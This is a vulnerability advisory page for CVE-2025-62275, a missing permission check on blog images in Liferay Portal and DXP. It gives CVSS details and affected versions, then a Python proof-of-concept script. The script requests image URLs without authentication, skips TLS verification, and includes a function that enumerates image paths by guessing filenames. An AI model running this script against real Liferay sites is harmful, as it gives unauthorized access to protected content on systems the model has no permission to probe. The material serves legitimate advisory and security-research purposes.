Security Vulnerability Report
CVE-2025-62275 CVSS 5.3 MEDIUM

CVE-2025-62275

Published: 2025-11-01 03:15:32
Last Modified: 2025-11-10 16:20:41

Description

Blogs in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, 7.4 GA through update 92, and older unsupported versions does not check permissions on images in a blog entry, which allows remote attackers to view the images in a blog entry via a crafted URL.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q3.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q3.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q3.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q3.4:*:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.0 through 7.4.3.111
Liferay DXP 2023.Q4.0 through 2023.Q4.10
Liferay DXP 2023.Q3.1 through 2023.Q3.10
Liferay DXP 7.4 GA through update 92
Liferay Portal/DXP: all older unsupported versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62275 PoC - Liferay Portal Blogs Image Permission Bypass
# This PoC demonstrates how to access blog images without proper authorization
import requests
import sys


def check_vulnerability(base_url, image_path):
    """
    Check if the target is vulnerable to CVE-2025-62275

    Args:
        base_url: Target Liferay Portal base URL (e.g., https://example.com)
        image_path: Path to the blog image (e.g., /documents/12345/67890/image.jpg)

    Returns:
        bool: True if vulnerable, False otherwise
    """
    target_url = f"{base_url.rstrip('/')}{image_path}"

    # Send request without authentication
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    try:
        response = requests.get(target_url, headers=headers, timeout=10, verify=False)

        # Check if we can access the image without authorization.
        # Only an actual image body counts: a 200 that returns an HTML
        # login or error page is not a bypass.
        if response.status_code == 200:
            content_type = response.headers.get('Content-Type', '')
            if content_type.startswith('image/') and len(response.content) > 0:
                print(f"[+] VULNERABLE: Image accessible at {target_url}")
                print(f"[+] Content-Type: {content_type}")
                print(f"[+] Content-Length: {len(response.content)} bytes")
                return True
            print(f"[*] UNKNOWN: HTTP 200 but non-image response ({content_type or 'no Content-Type'})")
            return False
        elif response.status_code in (401, 403):
            print(f"[-] NOT VULNERABLE: Access denied (HTTP {response.status_code})")
            return False
        else:
            print(f"[*] UNKNOWN: HTTP {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {str(e)}")
        return False


def enumerate_blog_images(base_url, group_id, folder_id, image_names):
    """
    Enumerate possible blog image URLs

    Args:
        base_url: Target Liferay Portal base URL
        group_id: Liferay group ID
        folder_id: Document folder ID
        image_names: List of common image filenames to try
    """
    print("\n[*] Enumerating blog images...")
    for img_name in image_names:
        path = f"/documents/{group_id}/{folder_id}/{img_name}"
        check_vulnerability(base_url, path)


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-62275-poc.py <base_url> <image_path>")
        print("Example: python cve-2025-62275-poc.py https://target.com /documents/12345/67890/blog-image.png")
        sys.exit(1)

    base_url = sys.argv[1]
    image_path = sys.argv[2]

    print(f"[*] Testing CVE-2025-62275 on {base_url}")
    print(f"[*] Target image path: {image_path}\n")

    check_vulnerability(base_url, image_path)

References

Raw JSON Data
